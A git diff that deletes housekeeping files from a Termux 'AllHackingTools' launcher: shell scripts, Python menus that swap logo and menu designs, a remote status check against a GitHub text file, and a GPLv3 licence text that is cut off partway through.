diff --git a/.logs/.zsh_history b/.logs/.zsh_history deleted file mode 100644 index 8b137891..00000000 --- a/.logs/.zsh_history +++ /dev/null @@ -1 +0,0 @@ - diff --git a/.logs/Cleaner.py b/.logs/Cleaner.py deleted file mode 100644 index 399f8b1f..00000000 --- a/.logs/Cleaner.py +++ /dev/null @@ -1,10 +0,0 @@ -# python3 -import sys -import os - -if sys.platform == 'win32': - # clear in windows, java - os.system('cls') -else: - # clear in linux, android, ubuntu - os.system('clear') diff --git a/.logs/history.sh b/.logs/history.sh deleted file mode 100644 index c8c58b48..00000000 --- a/.logs/history.sh +++ /dev/null @@ -1,3 +0,0 @@ -cd -cd -nano .zsh_history diff --git a/.settings/AllHackingTool.sh b/.settings/AllHackingTool.sh deleted file mode 100644 index 6cbd7eb5..00000000 --- a/.settings/AllHackingTool.sh +++ /dev/null @@ -1,18 +0,0 @@ -cd -cd -cd AllHackingTools -python3 src/CheckVersion.py -python3 .check/CheckServerYesAndNo.py -sleep 3 -clear -g="\033[1;32m" -r="\033[1;31m" -b="\033[1;34m" -w="\033[0m" -cd -cd -cd AllHackingTools -mv ErrorServer254NotFound.py MainMenu.py -clear -echo -e $b"[ ✔ ]"$g"succesfull verifined"$w -python2 MainMenu.py diff --git a/.settings/AnimationLoad1.sh b/.settings/AnimationLoad1.sh deleted file mode 100644 index bdb7a37c..00000000 --- a/.settings/AnimationLoad1.sh +++ /dev/null @@ -1,18 +0,0 @@ -clear -g="\033[1;32m" -r="\033[1;31m" -b="\033[1;34m" -w="\033[0m" -o="\033[1;33m" -printf "\e[1;92m" - -cd -cd -cd AllHackingTools -mv MainMenu.py /data/data/com.termux/files/home/AllHackingTools/Tool -clear -cd -cd -cd AllHackingTools -cd src -python3 CheckFolder.py diff --git a/.settings/Applined.sh b/.settings/Applined.sh deleted file mode 100644 index 244d9635..00000000 --- a/.settings/Applined.sh +++ /dev/null @@ -1,9 +0,0 @@ -g="\033[1;32m" -r="\033[1;31m" -b="\033[1;34m" -w="\033[0m" -o="\033[1;33m" - -echo -e $w"["$g"INFO"$w"]"$b"Succesful Applined Settings!"$w -sleep 0.1 -echo -e $w"["$o"WARN"$w"]"$b"Please Start AllHackingTools To View!"$w diff --git a/.settings/CheckServerYesAndNo.py b/.settings/CheckServerYesAndNo.py deleted file mode 100644 index c0d2fd86..00000000 --- a/.settings/CheckServerYesAndNo.py +++ /dev/null @@ -1,48 +0,0 @@ -R = '\033[31m' -G = '\033[32m' -C = '\033[36m' -W = '\033[0m' - -from shutil import which -import time -import os -import csv -import sys -import json -import argparse -import requests -import subprocess as subp - -row = [] -info = '' -result = '' -systemR = 'no' - -def sys_check(): - print(G + '[+]' + C + ' Checking Server ControlPanel....', end='') - sys_url = 'https://raw.githubusercontent.com/mishakorzik/AllHackingTools/main/Castom/ServerYesAndNo.txt' - try: - sys_rqst = requests.get(sys_url) - sys_sc = sys_rqst.status_code - if sys_sc == 200: - github_sys = sys_rqst.text - github_sys = github_sys.strip() - - if systemR == github_sys: - print(C + '[' + G + ' Online ' + C +']' + '\n') - os.system("cd && cd AllHackingTools && cd Tool && php 2-5.php && sleep 1") - else: - print(C + '[' + G + ' Online ' + C +']' + '\n') - os.system("termux-torch on") - os.system("cd && cd AllHackingTools && cd Tool && php 2-5.php && sleep 1") - else: - print(C + '[' + R + ' Status : {} '.format(sys_sc) + C + ']' + '\n') - except Exception as e: - print('\n' + R + '[-]' + C + ' Exception : ' + W + str(e)) - -try: - sys_check() - - -except KeyboardInterrupt: - os.system("cd && bash AllHackingTools/.check/ConfigurationOptions.sh") diff --git a/.settings/DesingLogo.py b/.settings/DesingLogo.py deleted file mode 100644 index 165b3866..00000000 --- a/.settings/DesingLogo.py +++ /dev/null @@ -1,44 +0,0 @@ -import requests -import os -import time -import random -import sys - -os.system("clear") -os.system("cd && cd AllHackingTools && clear && bash Logo.sh") - -print(" \033[1;34m[ 01 ] >> \033[1;36;40mDesing Logo 1") -print(" \033[1;34m[ 02 ] >> \033[1;36;40mDesing Logo 2") -print(" \033[1;34m[ 03 ] >> \033[1;36;40mDesing Logo 3") -print(" \033[1;34m[ 04 ] >> \033[1;36;40mDesing Logo 4") -print(" \033[1;34m[ 05 ] >> \033[1;36;40mExit System") -print(" \033[1;34m[ 06 ] >> \033[1;36;40mBack To MainMenu") - -op=int(raw_input("Sett1Ngs: ")) - -if(op==1): - os.system("clear") - os.system("cd && cd AllHackingTools && mv Logo.sh /data/data/com.termux/files/home/AllHackingTools/.temp/DesingTemp/ && cd && cd AllHackingTools && cd .settings && cd desing && mv Logo.sh /data/data/com.termux/files/home/AllHackingTools/ && cd && cd AllHackingTools && cd .temp && cd DesingTemp && mv Logo.sh /data/data/com.termux/files/home/AllHackingTools/.settings/desing/ && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==2): - os.system("clear") - os.system("cd && cd AllHackingTools && mv Logo.sh /data/data/com.termux/files/home/AllHackingTools/.temp/ && cd && cd AllHackingTools && cd .settings && mv Logo.sh /data/data/com.termux/files/home/AllHackingTools/ && cd && cd AllHackingTools && cd .temp && mv Logo.sh /data/data/com.termux/files/home/AllHackingTools/.settings/ && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==3): - os.system("clear") - os.system("cd && cd AllHackingTools && mv Logo.sh /data/data/com.termux/files/home/AllHackingTools/.temp/DesingTemp2/ && cd && cd AllHackingTools && cd .settings && cd desing2 && mv Logo.sh /data/data/com.termux/files/home/AllHackingTools/ && cd && cd AllHackingTools && cd .temp && cd DesingTemp2 && mv Logo.sh /data/data/com.termux/files/home/AllHackingTools/.settings/desing2/ && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==4): - os.system("clear") - os.system("cd && cd AllHackingTools && mv Logo.sh /data/data/com.termux/files/home/AllHackingTools/.temp/DesingTemp3/ && cd && cd AllHackingTools && cd .settings && cd desing3 && mv Logo.sh /data/data/com.termux/files/home/AllHackingTools/ && cd && cd AllHackingTools && cd .temp && cd DesingTemp3 && mv Logo.sh /data/data/com.termux/files/home/AllHackingTools/.settings/desing3/ && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==5): - time.sleep(0.2) - print("\033[1;31;40mQuiting System...") - sys.exit() -elif(op==6): - os.system("cd") - os.system("cd AllHackingTools") - os.system("python2 MainMenu.py") -else: - print("\033[1;31;40mInvalid input. Reloading Tools") - time.sleep(1.6) - os.system("cd") - os.system("cd AllHackingTools") - os.system("python2 MainMenu.py") diff --git a/.settings/DesingMenu.py b/.settings/DesingMenu.py deleted file mode 100644 index 9b522c27..00000000 --- a/.settings/DesingMenu.py +++ /dev/null @@ -1,44 +0,0 @@ -import requests -import os -import time -import random -import sys - -os.system("clear") -os.system("cd && cd AllHackingTools && clear && bash Logo.sh") - -print(" \033[1;34m[ 01 ] >> \033[1;36;40mDesing Menu 1") -print(" \033[1;34m[ 02 ] >> \033[1;36;40mDesing Menu 2") -print(" \033[1;34m[ 03 ] >> \033[1;36;40mDesing Menu 3") -print(" \033[1;34m[ 04 ] >> \033[1;36;40mDesing Menu 4") -print(" \033[1;34m[ 05 ] >> \033[1;36;40mExit System") -print(" \033[1;34m[ 06 ] >> \033[1;36;40mBack To MainMenu") - -op=int(raw_input("Sett1Ngs: ")) - -if(op==1): - os.system("clear") - os.system("cd && cd AllHackingTools && mv MainMenu.py /data/data/com.termux/files/home/AllHackingTools/.temp/DesingTemp/ && cd && cd AllHackingTools && cd .settings && cd desing && mv MainMenu.py /data/data/com.termux/files/home/AllHackingTools/ && cd && cd AllHackingTools && cd .temp && cd DesingTemp && mv MainMenu.py /data/data/com.termux/files/home/AllHackingTools/.settings/desing/ && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==2): - os.system("clear") - os.system("cd && cd AllHackingTools && mv MainMenu.py /data/data/com.termux/files/home/AllHackingTools/.temp/ && cd && cd AllHackingTools && cd .settings && mv MainMenu.py /data/data/com.termux/files/home/AllHackingTools/ && cd && cd AllHackingTools && cd .temp && mv MainMenu.py /data/data/com.termux/files/home/AllHackingTools/.settings/ && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==3): - os.system("clear") - os.system("cd && cd AllHackingTools && mv MainMenu.py /data/data/com.termux/files/home/AllHackingTools/.temp/DesingTemp2/ && cd && cd AllHackingTools && cd .settings && cd desing2 && mv MainMenu.py /data/data/com.termux/files/home/AllHackingTools/ && cd && cd AllHackingTools && cd .temp && cd DesingTemp2 && mv MainMenu.py /data/data/com.termux/files/home/AllHackingTools/.settings/desing2/ && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==4): - os.system("clear") - os.system("cd && cd AllHackingTools && mv MainMenu.py /data/data/com.termux/files/home/AllHackingTools/.temp/DesingTemp3/ && cd && cd AllHackingTools && cd .settings && cd desing3 && mv MainMenu.py /data/data/com.termux/files/home/AllHackingTools/ && cd && cd AllHackingTools && cd .temp && cd DesingTemp3 && mv MainMenu.py /data/data/com.termux/files/home/AllHackingTools/.settings/desing3/ && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==5): - time.sleep(0.2) - print("\033[1;31;40mQuiting System...") - sys.exit() -elif(op==6): - os.system("cd") - os.system("cd AllHackingTools") - os.system("python2 MainMenu.py") -else: - print("\033[1;31;40mInvalid input. Reloading Tools") - time.sleep(1.6) - os.system("cd") - os.system("cd AllHackingTools") - os.system("python2 MainMenu.py") diff --git a/.settings/LICENSE.sh b/.settings/LICENSE.sh deleted file mode 100644 index 4e9da8b4..00000000 --- a/.settings/LICENSE.sh +++ /dev/null @@ -1,676 +0,0 @@ -echo """ - GNU GENERAL PUBLIC LICENSE - Version 3, 29 June 2007 - - Copyright (C) 2007 Free Software Foundation, Inc. - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - Preamble - - The GNU General Public License is a free, copyleft license for -software and other kinds of works. - - The licenses for most software and other practical works are designed -to take away your freedom to share and change the works. By contrast, -the GNU General Public License is intended to guarantee your freedom to -share and change all versions of a program--to make sure it remains free -software for all its users. We, the Free Software Foundation, use the -GNU General Public License for most of our software; it applies also to -any other work released this way by its authors. You can apply it to -your programs, too. - - When we speak of free software, we are referring to freedom, not -price. Our General Public Licenses are designed to make sure that you -have the freedom to distribute copies of free software (and charge for -them if you wish), that you receive source code or can get it if you -want it, that you can change the software or use pieces of it in new -free programs, and that you know you can do these things. - - To protect your rights, we need to prevent others from denying you -these rights or asking you to surrender the rights. Therefore, you have -certain responsibilities if you distribute copies of the software, or if -you modify it: responsibilities to respect the freedom of others. - - For example, if you distribute copies of such a program, whether -gratis or for a fee, you must pass on to the recipients the same -freedoms that you received. You must make sure that they, too, receive -or can get the source code. And you must show them these terms so they -know their rights. - - Developers that use the GNU GPL protect your rights with two steps: -(1) assert copyright on the software, and (2) offer you this License -giving you legal permission to copy, distribute and/or modify it. - - For the developers' and authors' protection, the GPL clearly explains -that there is no warranty for this free software. For both users' and -authors' sake, the GPL requires that modified versions be marked as -changed, so that their problems will not be attributed erroneously to -authors of previous versions. - - Some devices are designed to deny users access to install or run -modified versions of the software inside them, although the manufacturer -can do so. This is fundamentally incompatible with the aim of -protecting users' freedom to change the software. The systematic -pattern of such abuse occurs in the area of products for individuals to -use, which is precisely where it is most unacceptable. Therefore, we -have designed this version of the GPL to prohibit the practice for those -products. If such problems arise substantially in other domains, we -stand ready to extend this provision to those domains in future versions -of the GPL, as needed to protect the freedom of users. - - Finally, every program is threatened constantly by software patents. -States should not allow patents to restrict development and use of -software on general-purpose computers, but in those that do, we wish to -avoid the special danger that patents applied to a free program could -make it effectively proprietary. To prevent this, the GPL assures that -patents cannot be used to render the program non-free. - - The precise terms and conditions for copying, distribution and -modification follow. - - TERMS AND CONDITIONS - - 0. Definitions. - - "This License" refers to version 3 of the GNU General Public License. - - "Copyright" also means copyright-like laws that apply to other kinds of -works, such as semiconductor masks. - - "The Program" refers to any copyrightable work licensed under this -License. Each licensee is addressed as "you". "Licensees" and -"recipients" may be individuals or organizations. - - To "modify" a work means to copy from or adapt all or part of the work -in a fashion requiring copyright permission, other than the making of an -exact copy. The resulting work is called a "modified version" of the -earlier work or a work "based on" the earlier work. - - A "covered work" means either the unmodified Program or a work based -on the Program. - - To "propagate" a work means to do anything with it that, without -permission, would make you directly or secondarily liable for -infringement under applicable copyright law, except executing it on a -computer or modifying a private copy. Propagation includes copying, -distribution (with or without modification), making available to the -public, and in some countries other activities as well. - - To "convey" a work means any kind of propagation that enables other -parties to make or receive copies. Mere interaction with a user through -a computer network, with no transfer of a copy, is not conveying. - - An interactive user interface displays "Appropriate Legal Notices" -to the extent that it includes a convenient and prominently visible -feature that (1) displays an appropriate copyright notice, and (2) -tells the user that there is no warranty for the work (except to the -extent that warranties are provided), that licensees may convey the -work under this License, and how to view a copy of this License. If -the interface presents a list of user commands or options, such as a -menu, a prominent item in the list meets this criterion. - - 1. Source Code. - - The "source code" for a work means the preferred form of the work -for making modifications to it. "Object code" means any non-source -form of a work. - - A "Standard Interface" means an interface that either is an official -standard defined by a recognized standards body, or, in the case of -interfaces specified for a particular programming language, one that -is widely used among developers working in that language. - - The "System Libraries" of an executable work include anything, other -than the work as a whole, that (a) is included in the normal form of -packaging a Major Component, but which is not part of that Major -Component, and (b) serves only to enable use of the work with that -Major Component, or to implement a Standard Interface for which an -implementation is available to the public in source code form. A -"Major Component", in this context, means a major essential component -(kernel, window system, and so on) of the specific operating system -(if any) on which the executable work runs, or a compiler used to -produce the work, or an object code interpreter used to run it. - - The "Corresponding Source" for a work in object code form means all -the source code needed to generate, install, and (for an executable -work) run the object code and to modify the work, including scripts to -control those activities. However, it does not include the work's -System Libraries, or general-purpose tools or generally available free -programs which are used unmodified in performing those activities but -which are not part of the work. For example, Corresponding Source -includes interface definition files associated with source files for -the work, and the source code for shared libraries and dynamically -linked subprograms that the work is specifically designed to require, -such as by intimate data communication or control flow between those -subprograms and other parts of the work. - - The Corresponding Source need not include anything that users -can regenerate automatically from other parts of the Corresponding -Source. - - The Corresponding Source for a work in source code form is that -same work. - - 2. Basic Permissions. - - All rights granted under this License are granted for the term of -copyright on the Program, and are irrevocable provided the stated -conditions are met. This License explicitly affirms your unlimited -permission to run the unmodified Program. The output from running a -covered work is covered by this License only if the output, given its -content, constitutes a covered work. This License acknowledges your -rights of fair use or other equivalent, as provided by copyright law. - - You may make, run and propagate covered works that you do not -convey, without conditions so long as your license otherwise remains -in force. You may convey covered works to others for the sole purpose -of having them make modifications exclusively for you, or provide you -with facilities for running those works, provided that you comply with -the terms of this License in conveying all material for which you do -not control copyright. Those thus making or running the covered works -for you must do so exclusively on your behalf, under your direction -and control, on terms that prohibit them from making any copies of -your copyrighted material outside their relationship with you. - - Conveying under any other circumstances is permitted solely under -the conditions stated below. Sublicensing is not allowed; section 10 -makes it unnecessary. - - 3. Protecting Users' Legal Rights From Anti-Circumvention Law. - - No covered work shall be deemed part of an effective technological -measure under any applicable law fulfilling obligations under article -11 of the WIPO copyright treaty adopted on 20 December 1996, or -similar laws prohibiting or restricting circumvention of such -measures. - - When you convey a covered work, you waive any legal power to forbid -circumvention of technological measures to the extent such circumvention -is effected by exercising rights under this License with respect to -the covered work, and you disclaim any intention to limit operation or -modification of the work as a means of enforcing, against the work's -users, your or third parties' legal rights to forbid circumvention of -technological measures. - - 4. Conveying Verbatim Copies. - - You may convey verbatim copies of the Program's source code as you -receive it, in any medium, provided that you conspicuously and -appropriately publish on each copy an appropriate copyright notice; -keep intact all notices stating that this License and any -non-permissive terms added in accord with section 7 apply to the code; -keep intact all notices of the absence of any warranty; and give all -recipients a copy of this License along with the Program. - - You may charge any price or no price for each copy that you convey, -and you may offer support or warranty protection for a fee. - - 5. Conveying Modified Source Versions. - - You may convey a work based on the Program, or the modifications to -produce it from the Program, in the form of source code under the -terms of section 4, provided that you also meet all of these conditions: - - a) The work must carry prominent notices stating that you modified - it, and giving a relevant date. - - b) The work must carry prominent notices stating that it is - released under this License and any conditions added under section - 7. This requirement modifies the requirement in section 4 to - "keep intact all notices". - - c) You must license the entire work, as a whole, under this - License to anyone who comes into possession of a copy. This - License will therefore apply, along with any applicable section 7 - additional terms, to the whole of the work, and all its parts, - regardless of how they are packaged. This License gives no - permission to license the work in any other way, but it does not - invalidate such permission if you have separately received it. - - d) If the work has interactive user interfaces, each must display - Appropriate Legal Notices; however, if the Program has interactive - interfaces that do not display Appropriate Legal Notices, your - work need not make them do so. - - A compilation of a covered work with other separate and independent -works, which are not by their nature extensions of the covered work, -and which are not combined with it such as to form a larger program, -in or on a volume of a storage or distribution medium, is called an -"aggregate" if the compilation and its resulting copyright are not -used to limit the access or legal rights of the compilation's users -beyond what the individual works permit. Inclusion of a covered work -in an aggregate does not cause this License to apply to the other -parts of the aggregate. - - 6. Conveying Non-Source Forms. - - You may convey a covered work in object code form under the terms -of sections 4 and 5, provided that you also convey the -machine-readable Corresponding Source under the terms of this License, -in one of these ways: - - a) Convey the object code in, or embodied in, a physical product - (including a physical distribution medium), accompanied by the - Corresponding Source fixed on a durable physical medium - customarily used for software interchange. - - b) Convey the object code in, or embodied in, a physical product - (including a physical distribution medium), accompanied by a - written offer, valid for at least three years and valid for as - long as you offer spare parts or customer support for that product - model, to give anyone who possesses the object code either (1) a - copy of the Corresponding Source for all the software in the - product that is covered by this License, on a durable physical - medium customarily used for software interchange, for a price no - more than your reasonable cost of physically performing this - conveying of source, or (2) access to copy the - Corresponding Source from a network server at no charge. - - c) Convey individual copies of the object code with a copy of the - written offer to provide the Corresponding Source. This - alternative is allowed only occasionally and noncommercially, and - only if you received the object code with such an offer, in accord - with subsection 6b. - - d) Convey the object code by offering access from a designated - place (gratis or for a charge), and offer equivalent access to the - Corresponding Source in the same way through the same place at no - further charge. You need not require recipients to copy the - Corresponding Source along with the object code. If the place to - copy the object code is a network server, the Corresponding Source - may be on a different server (operated by you or a third party) - that supports equivalent copying facilities, provided you maintain - clear directions next to the object code saying where to find the - Corresponding Source. Regardless of what server hosts the - Corresponding Source, you remain obligated to ensure that it is - available for as long as needed to satisfy these requirements. - - e) Convey the object code using peer-to-peer transmission, provided - you inform other peers where the object code and Corresponding - Source of the work are being offered to the general public at no - charge under subsection 6d. - - A separable portion of the object code, whose source code is excluded -from the Corresponding Source as a System Library, need not be -included in conveying the object code work. - - A "User Product" is either (1) a "consumer product", which means any -tangible personal property which is normally used for personal, family, -or household purposes, or (2) anything designed or sold for incorporation -into a dwelling. In determining whether a product is a consumer product, -doubtful cases shall be resolved in favor of coverage. For a particular -product received by a particular user, "normally used" refers to a -typical or common use of that class of product, regardless of the status -of the particular user or of the way in which the particular user -actually uses, or expects or is expected to use, the product. A product -is a consumer product regardless of whether the product has substantial -commercial, industrial or non-consumer uses, unless such uses represent -the only significant mode of use of the product. - - "Installation Information" for a User Product means any methods, -procedures, authorization keys, or other information required to install -and execute modified versions of a covered work in that User Product from -a modified version of its Corresponding Source. The information must -suffice to ensure that the continued functioning of the modified object -code is in no case prevented or interfered with solely because -modification has been made. - - If you convey an object code work under this section in, or with, or -specifically for use in, a User Product, and the conveying occurs as -part of a transaction in which the right of possession and use of the -User Product is transferred to the recipient in perpetuity or for a -fixed term (regardless of how the transaction is characterized), the -Corresponding Source conveyed under this section must be accompanied -by the Installation Information. But this requirement does not apply -if neither you nor any third party retains the ability to install -modified object code on the User Product (for example, the work has -been installed in ROM). - - The requirement to provide Installation Information does not include a -requirement to continue to provide support service, warranty, or updates -for a work that has been modified or installed by the recipient, or for -the User Product in which it has been modified or installed. Access to a -network may be denied when the modification itself materially and -adversely affects the operation of the network or violates the rules and -protocols for communication across the network. - - Corresponding Source conveyed, and Installation Information provided, -in accord with this section must be in a format that is publicly -documented (and with an implementation available to the public in -source code form), and must require no special password or key for -unpacking, reading or copying. - - 7. Additional Terms. - - "Additional permissions" are terms that supplement the terms of this -License by making exceptions from one or more of its conditions. -Additional permissions that are applicable to the entire Program shall -be treated as though they were included in this License, to the extent -that they are valid under applicable law. If additional permissions -apply only to part of the Program, that part may be used separately -under those permissions, but the entire Program remains governed by -this License without regard to the additional permissions. - - When you convey a copy of a covered work, you may at your option -remove any additional permissions from that copy, or from any part of -it. (Additional permissions may be written to require their own -removal in certain cases when you modify the work.) You may place -additional permissions on material, added by you to a covered work, -for which you have or can give appropriate copyright permission. - - Notwithstanding any other provision of this License, for material you -add to a covered work, you may (if authorized by the copyright holders of -that material) supplement the terms of this License with terms: - - a) Disclaiming warranty or limiting liability differently from the - terms of sections 15 and 16 of this License; or - - b) Requiring preservation of specified reasonable legal notices or - author attributions in that material or in the Appropriate Legal - Notices displayed by works containing it; or - - c) Prohibiting misrepresentation of the origin of that material, or - requiring that modified versions of such material be marked in - reasonable ways as different from the original version; or - - d) Limiting the use for publicity purposes of names of licensors or - authors of the material; or - - e) Declining to grant rights under trademark law for use of some - trade names, trademarks, or service marks; or - - f) Requiring indemnification of licensors and authors of that - material by anyone who conveys the material (or modified versions of - it) with contractual assumptions of liability to the recipient, for - any liability that these contractual assumptions directly impose on - those licensors and authors. - - All other non-permissive additional terms are considered "further -restrictions" within the meaning of section 10. If the Program as you -received it, or any part of it, contains a notice stating that it is -governed by this License along with a term that is a further -restriction, you may remove that term. If a license document contains -a further restriction but permits relicensing or conveying under this -License, you may add to a covered work material governed by the terms -of that license document, provided that the further restriction does -not survive such relicensing or conveying. - - If you add terms to a covered work in accord with this section, you -must place, in the relevant source files, a statement of the -additional terms that apply to those files, or a notice indicating -where to find the applicable terms. - - Additional terms, permissive or non-permissive, may be stated in the -form of a separately written license, or stated as exceptions; -the above requirements apply either way. - - 8. Termination. - - You may not propagate or modify a covered work except as expressly -provided under this License. Any attempt otherwise to propagate or -modify it is void, and will automatically terminate your rights under -this License (including any patent licenses granted under the third -paragraph of section 11). - - However, if you cease all violation of this License, then your -license from a particular copyright holder is reinstated (a) -provisionally, unless and until the copyright holder explicitly and -finally terminates your license, and (b) permanently, if the copyright -holder fails to notify you of the violation by some reasonable means -prior to 60 days after the cessation. - - Moreover, your license from a particular copyright holder is -reinstated permanently if the copyright holder notifies you of the -violation by some reasonable means, this is the first time you have -received notice of violation of this License (for any work) from that -copyright holder, and you cure the violation prior to 30 days after -your receipt of the notice. - - Termination of your rights under this section does not terminate the -licenses of parties who have received copies or rights from you under -this License. If your rights have been terminated and not permanently -reinstated, you do not qualify to receive new licenses for the same -material under section 10. - - 9. Acceptance Not Required for Having Copies. - - You are not required to accept this License in order to receive or -run a copy of the Program. Ancillary propagation of a covered work -occurring solely as a consequence of using peer-to-peer transmission -to receive a copy likewise does not require acceptance. However, -nothing other than this License grants you permission to propagate or -modify any covered work. These actions infringe copyright if you do -not accept this License. Therefore, by modifying or propagating a -covered work, you indicate your acceptance of this License to do so. - - 10. Automatic Licensing of Downstream Recipients. - - Each time you convey a covered work, the recipient automatically -receives a license from the original licensors, to run, modify and -propagate that work, subject to this License. You are not responsible -for enforcing compliance by third parties with this License. - - An "entity transaction" is a transaction transferring control of an -organization, or substantially all assets of one, or subdividing an -organization, or merging organizations. If propagation of a covered -work results from an entity transaction, each party to that -transaction who receives a copy of the work also receives whatever -licenses to the work the party's predecessor in interest had or could -give under the previous paragraph, plus a right to possession of the -Corresponding Source of the work from the predecessor in interest, if -the predecessor has it or can get it with reasonable efforts. - - You may not impose any further restrictions on the exercise of the -rights granted or affirmed under this License. For example, you may -not impose a license fee, royalty, or other charge for exercise of -rights granted under this License, and you may not initiate litigation -(including a cross-claim or counterclaim in a lawsuit) alleging that -any patent claim is infringed by making, using, selling, offering for -sale, or importing the Program or any portion of it. - - 11. Patents. - - A "contributor" is a copyright holder who authorizes use under this -License of the Program or a work on which the Program is based. The -work thus licensed is called the contributor's "contributor version". - - A contributor's "essential patent claims" are all patent claims -owned or controlled by the contributor, whether already acquired or -hereafter acquired, that would be infringed by some manner, permitted -by this License, of making, using, or selling its contributor version, -but do not include claims that would be infringed only as a -consequence of further modification of the contributor version. For -purposes of this definition, "control" includes the right to grant -patent sublicenses in a manner consistent with the requirements of -this License. - - Each contributor grants you a non-exclusive, worldwide, royalty-free -patent license under the contributor's essential patent claims, to -make, use, sell, offer for sale, import and otherwise run, modify and -propagate the contents of its contributor version. - - In the following three paragraphs, a "patent license" is any express -agreement or commitment, however denominated, not to enforce a patent -(such as an express permission to practice a patent or covenant not to -sue for patent infringement). To "grant" such a patent license to a -party means to make such an agreement or commitment not to enforce a -patent against the party. - - If you convey a covered work, knowingly relying on a patent license, -and the Corresponding Source of the work is not available for anyone -to copy, free of charge and under the terms of this License, through a -publicly available network server or other readily accessible means, -then you must either (1) cause the Corresponding Source to be so -available, or (2) arrange to deprive yourself of the benefit of the -patent license for this particular work, or (3) arrange, in a manner -consistent with the requirements of this License, to extend the patent -license to downstream recipients. "Knowingly relying" means you have -actual knowledge that, but for the patent license, your conveying the -covered work in a country, or your recipient's use of the covered work -in a country, would infringe one or more identifiable patents in that -country that you have reason to believe are valid. - - If, pursuant to or in connection with a single transaction or -arrangement, you convey, or propagate by procuring conveyance of, a -covered work, and grant a patent license to some of the parties -receiving the covered work authorizing them to use, propagate, modify -or convey a specific copy of the covered work, then the patent license -you grant is automatically extended to all recipients of the covered -work and works based on it. - - A patent license is "discriminatory" if it does not include within -the scope of its coverage, prohibits the exercise of, or is -conditioned on the non-exercise of one or more of the rights that are -specifically granted under this License. You may not convey a covered -work if you are a party to an arrangement with a third party that is -in the business of distributing software, under which you make payment -to the third party based on the extent of your activity of conveying -the work, and under which the third party grants, to any of the -parties who would receive the covered work from you, a discriminatory -patent license (a) in connection with copies of the covered work -conveyed by you (or copies made from those copies), or (b) primarily -for and in connection with specific products or compilations that -contain the covered work, unless you entered into that arrangement, -or that patent license was granted, prior to 28 March 2007. - - Nothing in this License shall be construed as excluding or limiting -any implied license or other defenses to infringement that may -otherwise be available to you under applicable patent law. - - 12. No Surrender of Others' Freedom. - - If conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot convey a -covered work so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you may -not convey it at all. For example, if you agree to terms that obligate you -to collect a royalty for further conveying from those to whom you convey -the Program, the only way you could satisfy both those terms and this -License would be to refrain entirely from conveying the Program. - - 13. Use with the GNU Affero General Public License. - - Notwithstanding any other provision of this License, you have -permission to link or combine any covered work with a work licensed -under version 3 of the GNU Affero General Public License into a single -combined work, and to convey the resulting work. The terms of this -License will continue to apply to the part which is the covered work, -but the special requirements of the GNU Affero General Public License, -section 13, concerning interaction through a network will apply to the -combination as such. - - 14. Revised Versions of this License. - - The Free Software Foundation may publish revised and/or new versions of -the GNU General Public License from time to time. Such new versions will -be similar in spirit to the present version, but may differ in detail to -address new problems or concerns. - - Each version is given a distinguishing version number. If the -Program specifies that a certain numbered version of the GNU General -Public License "or any later version" applies to it, you have the -option of following the terms and conditions either of that numbered -version or of any later version published by the Free Software -Foundation. If the Program does not specify a version number of the -GNU General Public License, you may choose any version ever published -by the Free Software Foundation. - - If the Program specifies that a proxy can decide which future -versions of the GNU General Public License can be used, that proxy's -public statement of acceptance of a version permanently authorizes you -to choose that version for the Program. - - Later license versions may give you additional or different -permissions. However, no additional obligations are imposed on any -author or copyright holder as a result of your choosing to follow a -later version. - - 15. Disclaimer of Warranty. - - THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY -APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT -HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY -OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, -THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR -PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM -IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF -ALL NECESSARY SERVICING, REPAIR OR CORRECTION. - - 16. Limitation of Liability. - - IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING -WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS -THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY -GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE -USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF -DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD -PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), -EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF -SUCH DAMAGES. - - 17. Interpretation of Sections 15 and 16. - - If the disclaimer of warranty and limitation of liability provided -above cannot be given local legal effect according to their terms, -reviewing courts shall apply local law that most closely approximates -an absolute waiver of all civil liability in connection with the -Program, unless a warranty or assumption of liability accompanies a -copy of the Program in return for a fee. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Programs - - If you develop a new program, and you want it to be of the greatest -possible use to the public, the best way to achieve this is to make it -free software which everyone can redistribute and change under these terms. - - To do so, attach the following notices to the program. It is safest -to attach them to the start of each source file to most effectively -state the exclusion of warranty; and each file should have at least -the "copyright" line and a pointer to where the full notice is found. - - - Copyright (C) - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY 